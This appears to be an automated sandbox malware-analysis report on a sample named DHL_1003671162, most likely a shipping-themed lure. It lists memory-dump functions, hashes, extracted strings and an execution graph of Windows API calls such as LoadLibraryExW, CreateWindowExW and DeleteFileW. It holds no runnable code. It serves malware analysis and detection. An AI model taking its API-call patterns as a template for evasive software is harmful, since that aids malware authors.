                                                Function 071BA7B1 Relevance: .1, Instructions: 147COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4f9e2e47803222e515d25b0d2dc79c2fb6913bcfc875eaf4de72f9fa911d2ad
                                                • Instruction ID: 8ebcc1eee7dc890a7e7d87f6896d19b85d9c9edd36356d9507dc8a2feb0f282b
                                                • Opcode Fuzzy Hash: c4f9e2e47803222e515d25b0d2dc79c2fb6913bcfc875eaf4de72f9fa911d2ad
                                                • Instruction Fuzzy Hash: 1C515BB0E1521ADFCB18CFAAD8855EEFBF2BF89310F10D46AD401A7294D7345A428F94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BA7C0 Relevance: .1, Instructions: 142COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 05e3cef39b8651d60bc6700d7c499f3eccaa38cbd31ea9fbe7a22eff55b4b588
                                                • Instruction ID: a2f40b39cf1833ffedb143796778a0f8dc01957fef2a30c6f3337ce1007337b4
                                                • Opcode Fuzzy Hash: 05e3cef39b8651d60bc6700d7c499f3eccaa38cbd31ea9fbe7a22eff55b4b588
                                                • Instruction Fuzzy Hash: F65119B0E1521ADFCB18CFA6D8465EEFBF2BF89311F10D42AD405A7294D7345A428F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0AE85441 Relevance: .1, Instructions: 132COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1707211800.000000000AE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AE80000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_ae80000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ef940cd9c1de0d3706fb062415efcd526427c32c28a60eb5cffa79b714f52f25
                                                • Instruction ID: feb690d5935de5094c071a49d8e161754e837b697e0c5f90d3c8adf86ed580d6
                                                • Opcode Fuzzy Hash: ef940cd9c1de0d3706fb062415efcd526427c32c28a60eb5cffa79b714f52f25
                                                • Instruction Fuzzy Hash: 5D511AB0E0021A8FCB18DFA9C5805AEFBF2FF89304F249169D418A7316DB319942CF64
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B88A0 Relevance: .1, Instructions: 104COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 02846600776c1e13aef7f7913648c2bcdee98695fa4a1dcbed06b930c08fa653
                                                • Instruction ID: 89373ee9262bea102598bbfe8c9692298283bcc3fc7262cdbad3a8a950624d68
                                                • Opcode Fuzzy Hash: 02846600776c1e13aef7f7913648c2bcdee98695fa4a1dcbed06b930c08fa653
                                                • Instruction Fuzzy Hash: 9241E6B0E0520A9FCB18CFAAD4815EEFBF2BF89700F24D06AD415E7254D734AA418F95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B88B0 Relevance: .1, Instructions: 101COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6f22663c08f349168b069134458953c311264cd01cabfeef254a0352de4d03bd
                                                • Instruction ID: 8daee64dbae80261f4ef45a3eebaa5bcfc1fd953cad8bec0d083227685326635
                                                • Opcode Fuzzy Hash: 6f22663c08f349168b069134458953c311264cd01cabfeef254a0352de4d03bd
                                                • Instruction Fuzzy Hash: 4241D3B0D0120ADBDF18CFAAD4815EEFBF6BB89700F24D16AC515B7244E734AA418F95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071B14E0 Relevance: 5.2, Strings: 4, Instructions: 203COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LR^q$LR^q$$^q$$^q
                                                • API String ID: 0-2454687669
                                                • Opcode ID: 100b99359b240d080c18823c9e09a26d5adcebc5761bfe6d51683a63c42d70e2
                                                • Instruction ID: e4c8b1911c6b056f45bb80b4ec4a2c2ad903c8c6d7332942b2ef92b3247e0244
                                                • Opcode Fuzzy Hash: 100b99359b240d080c18823c9e09a26d5adcebc5761bfe6d51683a63c42d70e2
                                                • Instruction Fuzzy Hash: 0E916BB5E10118DFCB28CF98C594AEDB7F1BF49315F168595E412AB294C334EC81DB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 071BDED0 Relevance: 5.1, Strings: 4, Instructions: 56COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1705059721.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_71b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: T+-q$[V~*$[V~*$]\`
                                                • API String ID: 0-1849991408
                                                • Opcode ID: 26084e6ba20c0e5057930cf6c54dd9b2761df281d930bfd08c6c57d5ec8588a6
                                                • Instruction ID: b7ea3024e2b578b8dbcde484db04dbdb7139a180ebc990ff89a280cee359bdf5
                                                • Opcode Fuzzy Hash: 26084e6ba20c0e5057930cf6c54dd9b2761df281d930bfd08c6c57d5ec8588a6
                                                • Instruction Fuzzy Hash: CC2193B1E016198BDB08CFAAD94459EFBF3AFC8300F14C16AD819AB258DB745942CF54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:10.9%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:158
                                                Total number of Limit Nodes:22
                                                execution_graph 44556 5a0b320 44557 5a0b362 44556->44557 44558 5a0b368 LoadLibraryExW 44556->44558 44557->44558 44559 5a0b399 44558->44559 44560 5a0ac00 44562 5a0ac31 44560->44562 44563 5a0ad31 44560->44563 44561 5a0ac3d 44562->44561 44569 5a0ae76 44562->44569 44573 5a0ae78 44562->44573 44564 5a0ac7d 44577 5a0c178 44564->44577 44586 5a0c169 44564->44586 44595 5a0aeb8 44569->44595 44604 5a0aec8 44569->44604 44570 5a0ae82 44570->44564 44574 5a0ae82 44573->44574 44575 5a0aeb8 2 API calls 44573->44575 44576 5a0aec8 2 API calls 44573->44576 44574->44564 44575->44574 44576->44574 44578 5a0c1a3 44577->44578 44620 5a0c6e0 44578->44620 44625 5a0c6d0 44578->44625 44579 5a0c226 44580 5a0a090 GetModuleHandleW 44579->44580 44582 5a0c252 44579->44582 44581 5a0c296 44580->44581 44583 5a0d065 CreateWindowExW 44581->44583 44583->44582 44587 5a0c178 44586->44587 44593 5a0c6e0 GetModuleHandleW 44587->44593 44594 5a0c6d0 GetModuleHandleW 44587->44594 44588 5a0c226 44589 5a0a090 GetModuleHandleW 44588->44589 44591 5a0c252 44588->44591 44590 5a0c296 44589->44590 44650 5a0d065 44590->44650 44593->44588 44594->44588 44596 5a0aebd 44595->44596 44599 5a0aefc 44596->44599 44613 5a0a090 44596->44613 44599->44570 44600 5a0b100 GetModuleHandleW 44602 5a0b12d 44600->44602 44601 5a0aef4 44601->44599 44601->44600 44602->44570 44605 5a0aed9 44604->44605 44608 5a0aefc 44604->44608 44606 5a0a090 GetModuleHandleW 44605->44606 44607 5a0aee4 44606->44607 44607->44608 44612 5a0b15d GetModuleHandleW 44607->44612 44608->44570 44609 5a0b100 GetModuleHandleW 44611 5a0b12d 44609->44611 44610 5a0aef4 44610->44608 44610->44609 44611->44570 44612->44610 44614 5a0b0b8 GetModuleHandleW 44613->44614 44616 5a0aee4 44614->44616 44616->44599 44617 5a0b15d 44616->44617 44618 5a0a090 GetModuleHandleW 44617->44618 44619 5a0b174 44618->44619 44619->44601 44621 5a0c70d 44620->44621 44622 5a0c78e 44621->44622 44630 5a0c850 44621->44630 44640 5a0c840 44621->44640 44626 5a0c6e0 44625->44626 44627 5a0c78e 44626->44627 44628 5a0c840 GetModuleHandleW 44626->44628 44629 5a0c850 GetModuleHandleW 44626->44629 44628->44627 44629->44627 44631 5a0c865 44630->44631 44632 5a0a090 GetModuleHandleW 44631->44632 44633 5a0c889 44631->44633 44632->44633 44634 5a0a090 GetModuleHandleW 44633->44634 44635 5a0ca45 44633->44635 44636 5a0c9cb 44634->44636 44635->44622 44636->44635 44637 5a0a090 GetModuleHandleW 44636->44637 44638 5a0ca19 44637->44638 44638->44635 44639 5a0a090 GetModuleHandleW 44638->44639 44639->44635 44641 5a0c865 44640->44641 44642 5a0a090 GetModuleHandleW 44641->44642 44643 5a0c889 44641->44643 44642->44643 44644 5a0a090 GetModuleHandleW 44643->44644 44649 5a0ca45 44643->44649 44645 5a0c9cb 44644->44645 44646 5a0a090 GetModuleHandleW 44645->44646 44645->44649 44647 5a0ca19 44646->44647 44648 5a0a090 GetModuleHandleW 44647->44648 44647->44649 44648->44649 44649->44622 44651 5a0d09d CreateWindowExW 44650->44651 44652 5a0d069 44650->44652 44654 5a0d1d4 44651->44654 44652->44591 44654->44654 44655 14b0848 44656 14b084e 44655->44656 44657 14b091b 44656->44657 44659 14b1390 44656->44659 44660 14b13a6 44659->44660 44661 14b14b8 44660->44661 44663 14b7528 44660->44663 44661->44656 44664 14b7532 44663->44664 44665 14b754c 44664->44665 44668 62cd80f 44664->44668 44673 62cd820 44664->44673 44665->44660 44670 62cd81a 44668->44670 44669 62cda4a 44669->44665 44670->44669 44671 62cda60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44670->44671 44672 62cda70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44670->44672 44671->44670 44672->44670 44675 62cd835 44673->44675 44674 62cda4a 44674->44665 44675->44674 44676 62cda60 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44675->44676 44677 62cda70 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 44675->44677 44676->44675 44677->44675 44678 139d01c 44679 139d034 44678->44679 44680 139d08e 44679->44680 44685 5a0a274 44679->44685 44694 5a0d268 44679->44694 44698 5a0e3b8 44679->44698 44707 5a0d257 44679->44707 44686 5a0a27f 44685->44686 44687 5a0e429 44686->44687 44689 5a0e419 44686->44689 44690 5a0e427 44687->44690 44727 5a0a33c 44687->44727 44711 5a0e540 44689->44711 44716 5a0e61c 44689->44716 44722 5a0e550 44689->44722 44695 5a0d28e 44694->44695 44696 5a0a274 CallWindowProcW 44695->44696 44697 5a0d2af 44696->44697 44697->44680 44699 5a0e3c8 44698->44699 44700 5a0e429 44699->44700 44702 5a0e419 44699->44702 44701 5a0a33c CallWindowProcW 44700->44701 44703 5a0e427 44700->44703 44701->44703 44704 5a0e540 CallWindowProcW 44702->44704 44705 5a0e550 CallWindowProcW 44702->44705 44706 5a0e61c CallWindowProcW 44702->44706 44704->44703 44705->44703 44706->44703 44708 5a0d265 44707->44708 44709 5a0a274 CallWindowProcW 44708->44709 44710 5a0d2af 44709->44710 44710->44680 44713 5a0e54e 44711->44713 44712 5a0e5f0 44712->44690 44731 5a0e5f8 44713->44731 44735 5a0e608 44713->44735 44717 5a0e5da 44716->44717 44718 5a0e62a 44716->44718 44720 5a0e5f8 CallWindowProcW 44717->44720 44721 5a0e608 CallWindowProcW 44717->44721 44719 5a0e5f0 44719->44690 44720->44719 44721->44719 44724 5a0e552 44722->44724 44723 5a0e5f0 44723->44690 44725 5a0e5f8 CallWindowProcW 44724->44725 44726 5a0e608 CallWindowProcW 44724->44726 44725->44723 44726->44723 44728 5a0a347 44727->44728 44729 5a0f88a CallWindowProcW 44728->44729 44730 5a0f839 44728->44730 44729->44730 44730->44690 44732 5a0e608 44731->44732 44734 5a0e619 44732->44734 44738 5a0f7c0 44732->44738 44734->44712 44736 5a0f7c0 CallWindowProcW 44735->44736 44737 5a0e619 44735->44737 44736->44737 44737->44712 44739 5a0f7d5 44738->44739 44740 5a0a33c CallWindowProcW 44739->44740 44741 5a0f7da 44740->44741 44741->44734 44742 14b7350 44743 14b7396 DeleteFileW 44742->44743 44745 14b73cf 44743->44745

                                                Executed Functions

                                                Function 05A0AEC8 Relevance: 1.7, APIs: 1, Instructions: 201COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3583 5a0aec8-5a0aed7 3584 5a0af03-5a0af07 3583->3584 3585 5a0aed9-5a0aee6 call 5a0a090 3583->3585 3587 5a0af09-5a0af13 3584->3587 3588 5a0af1b-5a0af5c 3584->3588 3591 5a0aee8-5a0aef6 call 5a0b15d 3585->3591 3592 5a0aefc 3585->3592 3587->3588 3594 5a0af69-5a0af77 3588->3594 3595 5a0af5e-5a0af66 3588->3595 3591->3592 3601 5a0b038-5a0b0f8 3591->3601 3592->3584 3596 5a0af79-5a0af7e 3594->3596 3597 5a0af9b-5a0af9d 3594->3597 3595->3594 3599 5a0af80-5a0af87 call 5a0a09c 3596->3599 3600 5a0af89 3596->3600 3602 5a0afa0-5a0afa7 3597->3602 3606 5a0af8b-5a0af99 3599->3606 3600->3606 3634 5a0b100-5a0b12b GetModuleHandleW 3601->3634 3635 5a0b0fa-5a0b0fd 3601->3635 3604 5a0afb4-5a0afbb 3602->3604 3605 5a0afa9-5a0afb1 3602->3605 3609 5a0afc8-5a0afd1 call 5a034a0 3604->3609 3610 5a0afbd-5a0afc5 3604->3610 3605->3604 3606->3602 3614 5a0afd3-5a0afdb 3609->3614 3615 5a0afde-5a0afe3 3609->3615 3610->3609 3614->3615 3616 5a0b001-5a0b00e 3615->3616 3617 5a0afe5-5a0afec 3615->3617 3624 5a0b010-5a0b02e 3616->3624 3625 5a0b031-5a0b037 3616->3625 3617->3616 3619 5a0afee-5a0affe call 5a08678 call 5a0a0ac 3617->3619 3619->3616 3624->3625 3636 5a0b134-5a0b148 3634->3636 3637 5a0b12d-5a0b133 3634->3637 3635->3634 3637->3636
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: 2b3a799cbe8d9df2941004ab65c3fd887dc4ff4d213db0fc3de110db8d18f76c
                                                • Instruction ID: d89ca2d88e1bae9e44ab3cece069ac641f0bfecb86139e14b890d4460f8a0521
                                                • Opcode Fuzzy Hash: 2b3a799cbe8d9df2941004ab65c3fd887dc4ff4d213db0fc3de110db8d18f76c
                                                • Instruction Fuzzy Hash: ED8124B0A10B058FD724DF2AE544B9ABBF1FF88304F108A29E496D7B90D775E845CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0D065 Relevance: 1.6, APIs: 1, Instructions: 139COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 3640 5a0d065-5a0d067 3641 5a0d069-5a0d090 call 5a0a24c 3640->3641 3642 5a0d09d-5a0d116 3640->3642 3647 5a0d095-5a0d096 3641->3647 3645 5a0d121-5a0d128 3642->3645 3646 5a0d118-5a0d11e 3642->3646 3648 5a0d133-5a0d1d2 CreateWindowExW 3645->3648 3649 5a0d12a-5a0d130 3645->3649 3646->3645 3651 5a0d1d4-5a0d1da 3648->3651 3652 5a0d1db-5a0d213 3648->3652 3649->3648 3651->3652 3656 5a0d220 3652->3656 3657 5a0d215-5a0d218 3652->3657 3658 5a0d221 3656->3658 3657->3656 3658->3658
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 91223474a8a85f8906e2904415127a95303e7284e0f6208ecd7185a0191f6e3a
                                                • Instruction ID: 72f6c3576a642f998a09a7078d3cfadea156f6e62eb2e7578d01b354f889ca9c
                                                • Opcode Fuzzy Hash: 91223474a8a85f8906e2904415127a95303e7284e0f6208ecd7185a0191f6e3a
                                                • Instruction Fuzzy Hash: B651F1B1C10249EFCF15CFA9D984ADEBFB6BF48300F14812AE818AB260D7719851CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 062CE638 Relevance: 1.6, APIs: 1, Instructions: 122COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 468bfd03453bcbb542e59ccb262bb3465f8140492b804e27b5804ee2d1a13824
                                                • Instruction ID: 48f85ae5cfa5dad6dbed016a69fc562739c6d360f76292af01c3f734a569014e
                                                • Opcode Fuzzy Hash: 468bfd03453bcbb542e59ccb262bb3465f8140492b804e27b5804ee2d1a13824
                                                • Instruction Fuzzy Hash: 99417772D143968FCB00DFB9C44029EBBF1AF89320F19866AD454A7351DB389844CBD1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0D0A4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: 5d6fc2650e6350baf94e206ffcff7c389bcb793ffa3059309df076611cf07db9
                                                • Instruction ID: 0561dc988110921023455d2dc3fe99938502b541c4059fb9016f21210dd8348c
                                                • Opcode Fuzzy Hash: 5d6fc2650e6350baf94e206ffcff7c389bcb793ffa3059309df076611cf07db9
                                                • Instruction Fuzzy Hash: C051D2B1D10349EFDB14CF99D984ADEBFB5BF48310F24812AE819AB250D775A841CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0D0B0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05A0D1C2
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CreateWindow
                                                • String ID:
                                                • API String ID: 716092398-0
                                                • Opcode ID: eee5963b8f87ce3def68091827a5dc3373508510f032d3fa4fee72b7365ccaca
                                                • Instruction ID: e92bf8540479fab807a92f15711ed5c990bed7fd1202cb56872fbf478e3807a5
                                                • Opcode Fuzzy Hash: eee5963b8f87ce3def68091827a5dc3373508510f032d3fa4fee72b7365ccaca
                                                • Instruction Fuzzy Hash: D741E2B1D10309AFDB14CF99D984ADEBFF5BF48310F24812AE819AB250D774A881CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0A33C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                Download Yara Rule
                                                APIs
                                                • CallWindowProcW.USER32(?,?,?,?,?), ref: 05A0F8B1
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: CallProcWindow
                                                • String ID:
                                                • API String ID: 2714655100-0
                                                • Opcode ID: bab8c766bc145c9437887e948572365a2a3127a895232876c4ebcc2c81cb1483
                                                • Instruction ID: 298b14c6f88fa0896c30969b939b3da7227323e256f3a437fd6dcc11066988ee
                                                • Opcode Fuzzy Hash: bab8c766bc145c9437887e948572365a2a3127a895232876c4ebcc2c81cb1483
                                                • Instruction Fuzzy Hash: 0A4117B4A10305DFCB14CF99C488EAABBF5FB88314F24C559D519AB361C734A885CFA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014B7348 Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 014B73C0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2931905396.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_14b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 691ea1858222f69610373e6f5eeb7f307a8cf3f283374f1a9c2268fb7bcd95dd
                                                • Instruction ID: 154cc8ee7a879f493cf6214f428e10ffd95817e492a92bd4cd9ce594f8000475
                                                • Opcode Fuzzy Hash: 691ea1858222f69610373e6f5eeb7f307a8cf3f283374f1a9c2268fb7bcd95dd
                                                • Instruction Fuzzy Hash: BB2147B1C0061A9FCB10CF9AC545BDEFBB4FF48320F10812AD818A7250D738A940CFA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0B31A Relevance: 1.6, APIs: 1, Instructions: 57libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05A0B38A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: 6cfb8f82378fbdf8f0bf3bb69bbafdce065345ab504b7d862dd7d9ea10eb7047
                                                • Instruction ID: 72cea29c51a0ec7c23a37c7836fec90b0305a6f364fb57d8fe3245c8c1f046cf
                                                • Opcode Fuzzy Hash: 6cfb8f82378fbdf8f0bf3bb69bbafdce065345ab504b7d862dd7d9ea10eb7047
                                                • Instruction Fuzzy Hash: B81137B6D003099FDB10CF9AD544ADEFBF8FB48310F20842AE429A7650C775A545CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 014B7350 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileW.KERNELBASE(00000000), ref: 014B73C0
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2931905396.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_14b0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: DeleteFile
                                                • String ID:
                                                • API String ID: 4033686569-0
                                                • Opcode ID: 91e6a139e8539e8c8f76bbd99727ec18e9bbf461aa04952ad2d266985143e1c2
                                                • Instruction ID: 241eccd7e3e360b1e46cf30205235e87b8bec62d491df859f38911efad68b996
                                                • Opcode Fuzzy Hash: 91e6a139e8539e8c8f76bbd99727ec18e9bbf461aa04952ad2d266985143e1c2
                                                • Instruction Fuzzy Hash: E91133B1C0065A9BCB14CF9AC585BDEFBB4BB48320F10812AD858A7250D338AA40CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 062CDE44 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE68A), ref: 062CE777
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 737858b3e0f3944579179bc4370e1f63e683589233447c71791e3b15308746c0
                                                • Instruction ID: a4f41a0c3f2e5d83cca8406fd64f2a75d18b1be6d4f679d55a620139a4d32177
                                                • Opcode Fuzzy Hash: 737858b3e0f3944579179bc4370e1f63e683589233447c71791e3b15308746c0
                                                • Instruction Fuzzy Hash: A91133B1C002599BCB10CF9AC544BAEFBF4AB08320F11822AE818B7241D378A944CFE5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 062CE708 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,062CE68A), ref: 062CE777
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2976780668.00000000062C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 062C0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_62c0000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: 85a12d91735c9d87581b8186f689e063b9e3d386dbcd1a092f901297b17bceb7
                                                • Instruction ID: 5b92251b918a9f190dfa26231c667d62ce0d043bc61555b8ae98faebca4c793c
                                                • Opcode Fuzzy Hash: 85a12d91735c9d87581b8186f689e063b9e3d386dbcd1a092f901297b17bceb7
                                                • Instruction Fuzzy Hash: E51100B1C002599FCB10CF9AD544BEEFBF5AB48320F25826AD858B7251D378A944CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0B320 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryExW.KERNELBASE(00000000,?,?), ref: 05A0B38A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: LibraryLoad
                                                • String ID:
                                                • API String ID: 1029625771-0
                                                • Opcode ID: da8e15e14ef8d69b18ded822022827f4ff91219b779ad978fb3dafc10ae32361
                                                • Instruction ID: 073d733eda24bae6e3a02d1c67d40220017a252b440c14af2fd6deacb7f29329
                                                • Opcode Fuzzy Hash: da8e15e14ef8d69b18ded822022827f4ff91219b779ad978fb3dafc10ae32361
                                                • Instruction Fuzzy Hash: 831134B6C003088FCB10CF9AD544ADEFBF4FB48310F20842AD419A7650C779A544CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 05A0A090 Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,05A0AEE4), ref: 05A0B11E
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.2975475322.0000000005A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A00000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_5a00000_DHL_1003671162.jbxd
                                                Similarity
                                                • API ID: HandleModule
                                                • String ID:
                                                • API String ID: 4139908857-0
                                                • Opcode ID: eb2af81c06a3b34f63ed380a69ec8b46ef1ac6f0af004077cce5d62b6f910265
